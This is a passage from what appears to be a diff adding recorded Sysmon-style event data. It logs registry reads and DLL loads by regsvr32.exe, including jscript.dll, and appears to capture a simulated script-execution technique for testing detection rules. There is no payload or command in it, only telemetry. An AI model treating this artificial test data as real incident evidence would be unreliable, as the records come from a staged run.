"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ncryptsslp.dll", + "image_path": "C:\\Windows\\System32\\ncryptsslp.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573239170000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240110000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "wldp.dll", + "image_path": "C:\\Windows\\System32\\wldp.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240110000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240110000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "userenv.dll", + "image_path": "C:\\Windows\\System32\\userenv.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240270000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\System32\\mpr.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "sxs.dll", + "image_path": "C:\\Windows\\System32\\sxs.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "gpapi.dll", + "image_path": "C:\\Windows\\System32\\gpapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreUAPCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", + "registry_value": "DelegateFolders", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "jscript.dll", + "image_path": "C:\\Windows\\System32\\jscript.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240270000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 